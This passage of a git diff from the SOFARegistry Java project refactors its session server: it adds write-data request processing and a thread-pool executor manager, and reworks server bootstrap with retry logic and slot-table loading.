com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.node.service.DataNodeService; + +/** + * @author kezhu.wukz + * @author shangyu.wh + * @version 1.0: WriteDataProcessor.java, v 0.1 2019-06-06 12:50 shangyu.wh Exp $ + */ +public class WriteDataProcessor { + + private static final Logger LOGGER = LoggerFactory.getLogger(WriteDataProcessor.class); + + private final ConnectId connectId; + + private final DataNodeService dataNodeService; + + public WriteDataProcessor(ConnectId connectId, DataNodeService dataNodeService) { + this.connectId = connectId; + this.dataNodeService = dataNodeService; + } + + public boolean process(WriteDataRequest request) { + switch (request.getRequestType()) { + case PUBLISHER: + doPublishAsync(request); + return true; + case UN_PUBLISHER: + doUnPublishAsync(request); + return true; + case CLIENT_OFF: + doClientOffAsync(request); + return true; + default: + LOGGER.error( + "Unknown request type, connectId={}, requestType={}, requestBody={}", + connectId, + request.getRequestType(), + request.getRequestBody()); + } + return false; + } + + private void doClientOffAsync(WriteDataRequest request) { + ClientOffWriteDataRequest req = (ClientOffWriteDataRequest) request; + dataNodeService.clientOff(req.getRequestBody()); + } + + private void doUnPublishAsync(WriteDataRequest request) { + PublisherWriteDataRequest req = (PublisherWriteDataRequest) request; + dataNodeService.unregister(req.getRequestBody()); + } + + private void doPublishAsync(WriteDataRequest request) { + PublisherWriteDataRequest req = (PublisherWriteDataRequest) request; + dataNodeService.register(req.getRequestBody()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataRequest.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataRequest.java new file mode 100644 index 000000000..570ff2111 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataRequest.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +import com.alipay.sofa.registry.common.model.ConnectId; + +/** + * @author kezhu.wukz + * @author shangyu.wh + * @version 1.0: WriteDataRequest.java, v 0.1 2019-06-06 18:42 shangyu.wh Exp $ + */ +public interface WriteDataRequest { + + /** The enum for request type */ + enum WriteDataRequestType { + PUBLISHER, + UN_PUBLISHER, + CLIENT_OFF + } + + /** + * Gets request body. + * + * @return the request body + */ + T getRequestBody(); + + WriteDataRequestType getRequestType(); + + ConnectId getConnectId(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/CommonConfig.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/CommonConfig.java index 71e4f81a2..fa9a258e2 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/CommonConfig.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/CommonConfig.java @@ -16,73 +16,74 @@ */ package com.alipay.sofa.registry.server.session.bootstrap; -import org.springframework.beans.factory.annotation.Value; - import java.util.Collection; import java.util.Map; +import org.apache.commons.lang.builder.ToStringBuilder; +import org.apache.commons.lang.builder.ToStringStyle; +import org.springframework.beans.factory.annotation.Value; /** - * * @author shangyu.wh * @version $Id: CommonConfig.java, v 0.1 2018-05-05 15:16 shangyu.wh Exp $ */ public class CommonConfig { - /** - * server local data center, get from System Property - * example: nodes.localDataCenter=DefaultDataCenter - */ - @Value("${nodes.localDataCenter}") - private String localDataCenter; + /** + * server local data center, get from System Property example: + * nodes.localDataCenter=DefaultDataCenter + */ + @Value("${nodes.localDataCenter}") + private String localDataCenter; - /** - * server local region, get from System Property - * example: nodes.localRegion=DEFAULT_ZONE - */ - @Value("${nodes.localRegion}") - private String localRegion; + /** server local region, get from System Property example: nodes.localRegion=DEFAULT_ZONE */ + @Value("${nodes.localRegion}") + private String localRegion; - /** - * metaNodeInfo, get from System Property - * example: nodes.metaNode=DefaultDataCenter:192.168.xxx.xxx,192.168.xxx.xxx,192.168.xxx.xxx|AnotherDataCenter:192.168.xxx.xxx,192.168.xxx.xxx,192.168.xxx.xxx - */ - @Value("#{PropertySplitter.mapOfList('${nodes.metaNode}')}") - private Map> metaNode; + /** + * metaNodeInfo, get from System Property example: + * nodes.metaNode=DefaultDataCenter:192.168.xxx.xxx,192.168.xxx.xxx,192.168.xxx.xxx|AnotherDataCenter:192.168.xxx.xxx,192.168.xxx.xxx,192.168.xxx.xxx + */ + @Value("#{PropertySplitter.mapOfList('${nodes.metaNode}')}") + private Map> metaNode; - /** - * Getter method for property metaNode. - * - * @return property value of metaNode - */ - public Map> getMetaNode() { - return metaNode; - } + /** + * Getter method for property metaNode. + * + * @return property value of metaNode + */ + public Map> getMetaNode() { + return metaNode; + } - /** - * Setter method for property metaNode. - * - * @param metaNode value to be assigned to property metaNode - */ - public void setMetaNode(Map> metaNode) { - this.metaNode = metaNode; - } + /** + * Setter method for property metaNode. + * + * @param metaNode value to be assigned to property metaNode + */ + public void setMetaNode(Map> metaNode) { + this.metaNode = metaNode; + } - /** - * Getter method for property localDataCenter. - * - * @return property value of localDataCenter - */ - public String getLocalDataCenter() { - return localDataCenter; - } + /** + * Getter method for property localDataCenter. + * + * @return property value of localDataCenter + */ + public String getLocalDataCenter() { + return localDataCenter; + } - /** - * Getter method for property localRegion. - * - * @return property value of localRegion - */ - public String getLocalRegion() { - return localRegion; - } + /** + * Getter method for property localRegion. + * + * @return property value of localRegion + */ + public String getLocalRegion() { + return localRegion; + } -} \ No newline at end of file + @Override + public String toString() { + return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/ExecutorManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/ExecutorManager.java new file mode 100644 index 000000000..d87f6c6d1 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/ExecutorManager.java @@ -0,0 +1,204 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.bootstrap; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionHeartbeatRegistry; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.task.MetricsableThreadPoolExecutor; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import java.util.HashMap; +import java.util.Map; +import java.util.concurrent.ArrayBlockingQueue; +import java.util.concurrent.LinkedBlockingQueue; +import java.util.concurrent.ScheduledThreadPoolExecutor; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.TimeUnit; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version $Id: ExecutorManager.java, v 0.1 2017-11-28 14:41 shangyu.wh Exp $ + */ +public class ExecutorManager { + + private static final Logger LOGGER = LoggerFactory.getLogger(ExecutorManager.class); + + private final ScheduledThreadPoolExecutor scheduler; + + private final ThreadPoolExecutor accessDataExecutor; + private final ThreadPoolExecutor dataChangeRequestExecutor; + private final ThreadPoolExecutor dataSlotSyncRequestExecutor; + private final ThreadPoolExecutor connectClientExecutor; + private final ThreadPoolExecutor accessMetadataExecutor; + + @Autowired protected SessionServerConfig sessionServerConfig; + + @Autowired protected MetaServerService metaServerService; + + @Autowired protected AppRevisionHeartbeatRegistry appRevisionHeartbeatRegistry; + + private Map reportExecutors = new HashMap<>(); + + private static final String ACCESS_DATA_EXECUTOR = "AccessDataExecutor"; + + private static final String DATA_CHANGE_REQUEST_EXECUTOR = "DataChangeExecutor"; + + private static final String DATA_SLOT_SYNC_REQUEST_EXECUTOR = "SlotSyncExecutor"; + + private static final String CONNECT_CLIENT_EXECUTOR = "ConnectClientExecutor"; + + private static final String ACCESS_METADATA_EXECUTOR = "AccessMetadataExecutor"; + + public ExecutorManager(SessionServerConfig sessionServerConfig) { + scheduler = + new ScheduledThreadPoolExecutor( + sessionServerConfig.getSessionSchedulerPoolSize(), + new NamedThreadFactory("SessionScheduler")); + + accessDataExecutor = + reportExecutors.computeIfAbsent( + ACCESS_DATA_EXECUTOR, + k -> + new MetricsableThreadPoolExecutor( + ACCESS_DATA_EXECUTOR, + sessionServerConfig.getAccessDataExecutorMinPoolSize(), + sessionServerConfig.getAccessDataExecutorMaxPoolSize(), + sessionServerConfig.getAccessDataExecutorKeepAliveTime(), + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(sessionServerConfig.getAccessDataExecutorQueueSize()), + new NamedThreadFactory(ACCESS_DATA_EXECUTOR, true), + (r, executor) -> { + String msg = + String.format( + "Task(%s) %s rejected from %s, just ignore it to let client timeout.", + r.getClass(), r, executor); + LOGGER.error(msg); + })); + + dataChangeRequestExecutor = + reportExecutors.computeIfAbsent( + DATA_CHANGE_REQUEST_EXECUTOR, + k -> + new MetricsableThreadPoolExecutor( + DATA_CHANGE_REQUEST_EXECUTOR, + sessionServerConfig.getDataChangeExecutorMinPoolSize(), + sessionServerConfig.getDataChangeExecutorMaxPoolSize(), + sessionServerConfig.getDataChangeExecutorKeepAliveTime(), + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(sessionServerConfig.getDataChangeExecutorQueueSize()), + new NamedThreadFactory(DATA_CHANGE_REQUEST_EXECUTOR, true))); + + dataSlotSyncRequestExecutor = + reportExecutors.computeIfAbsent( + DATA_SLOT_SYNC_REQUEST_EXECUTOR, + k -> + new MetricsableThreadPoolExecutor( + DATA_SLOT_SYNC_REQUEST_EXECUTOR, + sessionServerConfig.getSlotSyncWorkerSize(), + sessionServerConfig.getSlotSyncWorkerSize(), + 60, + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(sessionServerConfig.getSlotSyncMaxBufferSize()), + new NamedThreadFactory(DATA_SLOT_SYNC_REQUEST_EXECUTOR, true))); + accessMetadataExecutor = + reportExecutors.computeIfAbsent( + ACCESS_METADATA_EXECUTOR, + k -> + new MetricsableThreadPoolExecutor( + ACCESS_METADATA_EXECUTOR, + sessionServerConfig.getAccessMetadataWorkerSize(), + sessionServerConfig.getAccessMetadataWorkerSize(), + 60, + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(sessionServerConfig.getAccessMetadataMaxBufferSize()), + new NamedThreadFactory(ACCESS_METADATA_EXECUTOR, true))); + connectClientExecutor = + reportExecutors.computeIfAbsent( + CONNECT_CLIENT_EXECUTOR, + k -> + new MetricsableThreadPoolExecutor( + CONNECT_CLIENT_EXECUTOR, + sessionServerConfig.getConnectClientExecutorMinPoolSize(), + sessionServerConfig.getConnectClientExecutorMaxPoolSize(), + 60L, + TimeUnit.SECONDS, + new LinkedBlockingQueue( + sessionServerConfig.getConnectClientExecutorQueueSize()), + new NamedThreadFactory(CONNECT_CLIENT_EXECUTOR, true))); + } + + public void startScheduler() { + scheduler.scheduleWithFixedDelay( + () -> appRevisionHeartbeatRegistry.doHeartbeatCacheChecker(), + sessionServerConfig.getHeartbeatCacheCheckerInitialDelaySecs(), + sessionServerConfig.getHeartbeatCacheCheckerSecs(), + TimeUnit.SECONDS); + scheduler.scheduleWithFixedDelay( + () -> appRevisionHeartbeatRegistry.doRevisionHeartbeat(), + sessionServerConfig.getRevisionHeartbeatInitialDelayMinutes(), + sessionServerConfig.getRevisionHeartbeatMinutes(), + TimeUnit.MINUTES); + } + + public void stopScheduler() { + if (scheduler != null && !scheduler.isShutdown()) { + scheduler.shutdown(); + } + + if (accessDataExecutor != null && !accessDataExecutor.isShutdown()) { + accessDataExecutor.shutdown(); + } + + if (dataChangeRequestExecutor != null && !dataChangeRequestExecutor.isShutdown()) { + dataChangeRequestExecutor.shutdown(); + } + + if (dataSlotSyncRequestExecutor != null && !dataSlotSyncRequestExecutor.isShutdown()) { + dataSlotSyncRequestExecutor.shutdown(); + } + + if (connectClientExecutor != null && !connectClientExecutor.isShutdown()) { + connectClientExecutor.shutdown(); + } + } + + public Map getReportExecutors() { + return reportExecutors; + } + + public ThreadPoolExecutor getAccessDataExecutor() { + return accessDataExecutor; + } + + public ThreadPoolExecutor getDataChangeRequestExecutor() { + return dataChangeRequestExecutor; + } + + public ThreadPoolExecutor getDataSlotSyncRequestExecutor() { + return dataSlotSyncRequestExecutor; + } + + public ThreadPoolExecutor getConnectClientExecutor() { + return connectClientExecutor; + } + + public ThreadPoolExecutor getAccessMetadataExecutor() { + return accessMetadataExecutor; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerBootstrap.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerBootstrap.java index 87b01b6bb..b488309a3 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerBootstrap.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerBootstrap.java @@ -16,416 +16,425 @@ */ package com.alipay.sofa.registry.server.session.bootstrap; -import com.alipay.sofa.registry.common.model.Node; +import com.alipay.remoting.CustomSerializerManager; +import com.alipay.remoting.serialization.SerializerManager; +import com.alipay.sofa.registry.common.model.client.pb.*; import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.metaserver.FetchProvideDataRequest; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; import com.alipay.sofa.registry.common.model.metaserver.ProvideData; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.metrics.ReporterUtils; import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.Client; import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.serializer.ProtobufCustomSerializer; +import com.alipay.sofa.registry.remoting.bolt.serializer.ProtobufSerializer; import com.alipay.sofa.registry.remoting.exchange.Exchange; import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManagerFactory; -import com.alipay.sofa.registry.server.session.node.RaftClientManager; -import com.alipay.sofa.registry.server.session.node.SessionProcessIdGenerator; -import com.alipay.sofa.registry.server.session.remoting.handler.AbstractClientHandler; -import com.alipay.sofa.registry.server.session.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistManager; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionCacheRegistry; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessor; +import com.alipay.sofa.registry.server.session.registry.SessionRegistry; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import org.glassfish.jersey.server.ResourceConfig; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.context.ApplicationContext; -import org.springframework.util.CollectionUtils; - -import javax.annotation.Resource; -import javax.ws.rs.Path; -import javax.ws.rs.ext.Provider; +import com.github.rholder.retry.*; +import com.google.common.base.Predicate; import java.lang.annotation.Annotation; import java.util.Collection; import java.util.Date; import java.util.Map; +import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; +import javax.annotation.Resource; +import javax.ws.rs.Path; +import javax.ws.rs.ext.Provider; +import org.glassfish.jersey.server.ResourceConfig; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.context.ApplicationContext; /** * The type Session server bootstrap. + * * @author shangyu.wh * @version $Id : SessionServerBootstrap.java, v 0.1 2017-11-14 11:44 synex Exp $ */ public class SessionServerBootstrap { - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionServerBootstrap.class); + private static final Logger LOGGER = LoggerFactory.getLogger(SessionServerBootstrap.class); - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired private SessionServerConfig sessionServerConfig; - @Autowired - private Exchange boltExchange; + @Autowired private Exchange boltExchange; - @Autowired - private Exchange jerseyExchange; + @Autowired private Exchange jerseyExchange; - @Autowired - private ExecutorManager executorManager; + @Autowired private ExecutorManager executorManager; - @Resource(name = "serverHandlers") - private Collection serverHandlers; + @Autowired private SessionRegistry sessionRegistry; - @Resource(name = "dataClientHandlers") - private Collection dataClientHandlers; + @Resource(name = "serverHandlers") + private Collection serverHandlers; - @Autowired - private NodeManager dataNodeManager; + @Autowired protected MetaServerService metaNodeService; + @Autowired private NodeExchanger dataNodeExchanger; + @Autowired private NodeExchanger dataNodeNotifyExchanger; - @Autowired - private NodeManager metaNodeManager; + @Autowired private ResourceConfig jerseyResourceConfig; - @Autowired - protected NodeExchanger metaNodeExchanger; + @Autowired private ApplicationContext applicationContext; - @Autowired - private ResourceConfig jerseyResourceConfig; + @Autowired private BlacklistManager blacklistManager; - @Autowired - private ApplicationContext applicationContext; + @Autowired private ProvideDataProcessor provideDataProcessorManager; - @Autowired - private RaftClientManager raftClientManager; + @Autowired private SlotTableCache slotTableCache; - private Server server; + private Server server; - private Server httpServer; + private Server dataSyncServer; - private Client dataClient; + @Resource(name = "sessionSyncHandlers") + private Collection sessionSyncHandlers; - private Client metaClient; + @Autowired private AppRevisionCacheRegistry appRevisionCacheRegistry; - private AtomicBoolean metaStart = new AtomicBoolean(false); + private Server httpServer; - private AtomicBoolean schedulerStart = new AtomicBoolean(false); + private final AtomicBoolean metaStart = new AtomicBoolean(false); - private AtomicBoolean httpStart = new AtomicBoolean(false); + private final AtomicBoolean schedulerStart = new AtomicBoolean(false); - private AtomicBoolean serverStart = new AtomicBoolean(false); + private final AtomicBoolean httpStart = new AtomicBoolean(false); - private AtomicBoolean dataStart = new AtomicBoolean(false); + private final AtomicBoolean serverStart = new AtomicBoolean(false); - /** - * Do initialized. - */ - public void doInitialized() { - try { - initEnvironment(); + private final AtomicBoolean dataStart = new AtomicBoolean(false); - startRaftClient(); + private final AtomicBoolean serverForSessionSyncStart = new AtomicBoolean(false); - connectMetaServer(); - - startScheduler(); - - openHttpServer(); - - openSessionServer(); - - connectDataServer(); - - LOGGER.info("Initialized Session Server..."); - - Runtime.getRuntime().addShutdownHook(new Thread(this::doStop)); - } catch (Throwable e) { - LOGGER.error("Cannot bootstrap session server :", e); - throw new RuntimeException("Cannot bootstrap session server :", e); - } - } - - /** - * Destroy. - */ - public void destroy() { - doStop(); - } - - private void doStop() { - try { - LOGGER.info("{} Shutting down Session Server..", new Date().toString()); - - executorManager.stopScheduler(); - TaskDispatchers.stopDefaultSingleTaskDispatcher(); - closeClients(); - stopHttpServer(); - stopServer(); - } catch (Throwable e) { - LOGGER.error("Shutting down Session Server error!", e); - } - LOGGER.info("{} Session server is now shutdown...", new Date().toString()); - } + private final Retryer retryer = + RetryerBuilder.newBuilder() + .retryIfRuntimeException() + .retryIfResult( + new Predicate() { + @Override + public boolean apply(Boolean input) { + return !input; + } + }) + .withWaitStrategy(WaitStrategies.exponentialWait(1000, 10000, TimeUnit.MILLISECONDS)) + .withStopStrategy(StopStrategies.stopAfterAttempt(10)) + .build(); - private void initEnvironment() { - LOGGER.info("Session server Environment: DataCenter {},Region {},ProcessId {}", - sessionServerConfig.getSessionServerDataCenter(), - sessionServerConfig.getSessionServerRegion(), - SessionProcessIdGenerator.getSessionProcessId()); - } + /** Do initialized. */ + public void start() { + try { + LOGGER.info("release properties: {}", ServerEnv.getReleaseProps()); + LOGGER.info("the configuration items are as follows: " + sessionServerConfig.toString()); - private void startScheduler() { - - try { - if (schedulerStart.compareAndSet(false, true)) { - executorManager.startScheduler(); - LOGGER.info("Session Scheduler started!"); - } - } catch (Exception e) { - schedulerStart.set(false); - LOGGER.error("Session Scheduler start error!", e); - throw new RuntimeException("Session Scheduler start error!", e); - } - } + initEnvironment(); + ReporterUtils.enablePrometheusDefaultExports(); - private void openSessionServer() { - try { - if (serverStart.compareAndSet(false, true)) { - server = boltExchange.open(new URL(NetUtil.getLocalAddress().getHostAddress(), - sessionServerConfig.getServerPort()), serverHandlers - .toArray(new ChannelHandler[serverHandlers.size()])); - - LOGGER.info("Session server started! port:{}", sessionServerConfig.getServerPort()); - } - } catch (Exception e) { - serverStart.set(false); - LOGGER.error("Session server start error! port:{}", - sessionServerConfig.getServerPort(), e); - throw new RuntimeException("Session server start error!", e); - } - } + openSessionSyncServer(); - private void connectDataServer() { - try { - if (dataStart.compareAndSet(false, true)) { - Collection dataNodes = dataNodeManager.getDataCenterNodes(); - if (CollectionUtils.isEmpty(dataNodes)) { - dataNodeManager.getAllDataCenterNodes(); - dataNodes = dataNodeManager.getDataCenterNodes(); - } - if (!CollectionUtils.isEmpty(dataNodes)) { - for (Node dataNode : dataNodes) { - if (dataNode.getNodeUrl() == null - || dataNode.getNodeUrl().getIpAddress() == null) { - LOGGER - .error("get data node address error!url{}", dataNode.getNodeUrl()); - continue; - } - dataClient = boltExchange.connect( - Exchange.DATA_SERVER_TYPE, - new URL(dataNode.getNodeUrl().getIpAddress(), sessionServerConfig - .getDataServerPort()), dataClientHandlers - .toArray(new ChannelHandler[dataClientHandlers.size()])); - } - LOGGER.info("Data server connected {} server! port:{}", dataNodes.size(), - sessionServerConfig.getDataServerPort()); - } - } - } catch (Exception e) { - dataStart.set(false); - LOGGER.error("Data server connected server error! port:{}", - sessionServerConfig.getDataServerPort(), e); - throw new RuntimeException("Data server connected server error!", e); - } - } - - private void startRaftClient() { - raftClientManager.startRaftClient(); - LOGGER.info("Raft Client started! Leader:{}", raftClientManager.getLeader()); - } - - private void connectMetaServer() { - try { - if (metaStart.compareAndSet(false, true)) { - metaClient = metaNodeExchanger.connectServer(); + retryer.call( + () -> { + connectMetaServer(); + return true; + }); - int size = metaClient.getChannels().size(); + // wait until slot table is get + retryer.call( + () -> slotTableCache.getCurrentSlotTable().getEpoch() != SlotTable.INIT.getEpoch()); - URL leaderUrl = new URL(raftClientManager.getLeader().getIp(), - sessionServerConfig.getMetaServerPort()); + // load metadata + retryer.call( + () -> { + appRevisionCacheRegistry.loadMetadata(); + return true; + }); - registerSessionNode(leaderUrl); + startScheduler(); - getAllDataCenter(); + openHttpServer(); - fetchStopPushSwitch(leaderUrl); + retryer.call( + () -> { + connectDataServer(); + return true; + }); - LOGGER.info("MetaServer connected {} server! Port:{}", size, - sessionServerConfig.getMetaServerPort()); - } - } catch (Exception e) { - metaStart.set(false); - LOGGER.error("MetaServer connected server error! Port:{}", - sessionServerConfig.getMetaServerPort(), e); - throw new RuntimeException("MetaServer connected server error!", e); - } - } + registerSerializer(); - private void registerSessionNode(URL leaderUrl) { - URL clientUrl = new URL(NetUtil.getLocalAddress().getHostAddress(), 0); - SessionNode sessionNode = new SessionNode(clientUrl, - sessionServerConfig.getSessionServerRegion()); - Object ret = sendMetaRequest(sessionNode, leaderUrl); - if (ret instanceof NodeChangeResult) { - NodeChangeResult nodeChangeResult = (NodeChangeResult) ret; - NodeManager nodeManager = NodeManagerFactory.getNodeManager(nodeChangeResult - .getNodeType()); - //update data node info - nodeManager.updateNodes(nodeChangeResult); - LOGGER.info("Register MetaServer Session Node success!get data node list {}", - nodeChangeResult.getNodes()); - } - } + openSessionServer(); - private void fetchStopPushSwitch(URL leaderUrl) { - FetchProvideDataRequest fetchProvideDataRequest = new FetchProvideDataRequest( - ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); - Object ret = sendMetaRequest(fetchProvideDataRequest, leaderUrl); - if (ret instanceof ProvideData) { - ProvideData provideData = (ProvideData) ret; - if (provideData.getProvideData() == null - || provideData.getProvideData().getObject() == null) { - LOGGER.info("Fetch session stop push switch no data existed,config not change!"); - return; - } - String data = (String) provideData.getProvideData().getObject(); - sessionServerConfig.setStopPushSwitch(Boolean.valueOf(data)); - if (data != null) { - if (!Boolean.valueOf(data)) { - //stop push init on,then begin fetch data schedule task - sessionServerConfig.setBeginDataFetchTask(true); - } - } - LOGGER.info("Fetch session stop push data switch {} success!", data); - } else { - LOGGER.info("Fetch session stop push switch data null,config not change!"); - } - } + LOGGER.info("Initialized Session Server..."); - private Object sendMetaRequest(Object request, URL leaderUrl) { - Object ret; - try { - ret = metaClient.sendSync(metaClient.getChannel(leaderUrl), request, - sessionServerConfig.getMetaNodeExchangeTimeOut()); - } catch (Exception e) { - URL leaderUrlNew = new URL(raftClientManager.refreshLeader().getIp(), - sessionServerConfig.getMetaServerPort()); - LOGGER.warn("request send error!It will be retry once to new leader {}!", leaderUrlNew); - ret = metaClient.sendSync(metaClient.getChannel(leaderUrlNew), request, - sessionServerConfig.getMetaNodeExchangeTimeOut()); - } - return ret; + Runtime.getRuntime().addShutdownHook(new Thread(this::doStop)); + } catch (Throwable e) { + LOGGER.error("Cannot bootstrap session server :", e); + throw new RuntimeException("Cannot bootstrap session server :", e); } - - private void getAllDataCenter() { - //get meta node info - metaNodeManager.getAllDataCenterNodes(); - LOGGER.info("Get all dataCenter from meta Server success!"); + } + + /** Destroy. */ + public void destroy() { + doStop(); + } + + private void doStop() { + try { + LOGGER.info("{} Shutting down Session Server..", new Date().toString()); + + executorManager.stopScheduler(); + TaskDispatchers.stopDefaultSingleTaskDispatcher(); + stopHttpServer(); + stopServer(); + stopDataSyncServer(); + } catch (Throwable e) { + LOGGER.error("Shutting down Session Server error!", e); } - - private void openHttpServer() { - try { - if (httpStart.compareAndSet(false, true)) { - bindResourceConfig(); - httpServer = jerseyExchange.open( - new URL(NetUtil.getLocalAddress().getHostAddress(), sessionServerConfig - .getHttpServerPort()), new ResourceConfig[] { jerseyResourceConfig }); - LOGGER.info("Open http server port {} success!", - sessionServerConfig.getHttpServerPort()); - } - } catch (Exception e) { - LOGGER.error("Open http server port {} error!", - sessionServerConfig.getHttpServerPort(), e); - httpStart.set(false); - throw new RuntimeException("Open http server error!", e); - } + LOGGER.info("{} Session server is now shutdown...", new Date().toString()); + } + + private void initEnvironment() { + LOGGER.info( + "Session server Environment: DataCenter {},Region {},ProcessId {}", + sessionServerConfig.getSessionServerDataCenter(), + sessionServerConfig.getSessionServerRegion(), + ServerEnv.PROCESS_ID); + } + + private void startScheduler() { + + try { + if (schedulerStart.compareAndSet(false, true)) { + executorManager.startScheduler(); + LOGGER.info("Session Scheduler started!"); + } + } catch (Exception e) { + schedulerStart.set(false); + LOGGER.error("Session Scheduler start error!", e); + throw new RuntimeException("Session Scheduler start error!", e); } - - private void bindResourceConfig() { - registerInstances(Path.class); - registerInstances(Provider.class); + } + + private void openSessionServer() { + try { + if (serverStart.compareAndSet(false, true)) { + server = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + sessionServerConfig.getServerPort()), + serverHandlers.toArray(new ChannelHandler[serverHandlers.size()])); + LOGGER.info("Session server started! port:{}", sessionServerConfig.getServerPort()); + } + } catch (Exception e) { + serverStart.set(false); + LOGGER.error("Session server start error! port:{}", sessionServerConfig.getServerPort(), e); + throw new RuntimeException("Session server start error!", e); } - - private void registerInstances(Class annotationType) { - Map beans = applicationContext.getBeansWithAnnotation(annotationType); - if (beans != null && !beans.isEmpty()) { - beans.forEach((beanName, bean) -> { - jerseyResourceConfig.registerInstances(bean); - jerseyResourceConfig.register(bean.getClass()); - }); - } + } + + private void openSessionSyncServer() { + try { + if (serverForSessionSyncStart.compareAndSet(false, true)) { + dataSyncServer = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + sessionServerConfig.getSyncSessionPort()), + sessionServerConfig.getSyncSessionIOLowWaterMark(), + sessionServerConfig.getSyncSessionIOHighWaterMark(), + sessionSyncHandlers.toArray(new ChannelHandler[sessionSyncHandlers.size()])); + LOGGER.info( + "Data server for sync started! port:{}", sessionServerConfig.getSyncSessionPort()); + } + } catch (Exception e) { + serverForSessionSyncStart.set(false); + LOGGER.error( + "Data sync server start error! port:{}", sessionServerConfig.getSyncSessionPort(), e); + throw new RuntimeException("Data sync server start error!", e); } - - private void stopServer() { - if (server != null && server.isOpen()) { - server.close(); - } + } + + private void connectDataServer() { + try { + dataNodeNotifyExchanger.connectServer(); + dataNodeExchanger.connectServer(); + dataStart.set(true); + } catch (Exception e) { + dataStart.set(false); + LOGGER.error( + "Data server connected server error! port:{}", + sessionServerConfig.getDataServerPort(), + e); + throw new RuntimeException("Data server connected server error!", e); } - - private void closeClients() { - if (dataClient != null && !dataClient.isClosed()) { - dataClient.close(); - } + } + + private void connectMetaServer() { + try { + // register node as renew node + metaNodeService.renewNode(); + // start sched renew + metaNodeService.startRenewer(); + 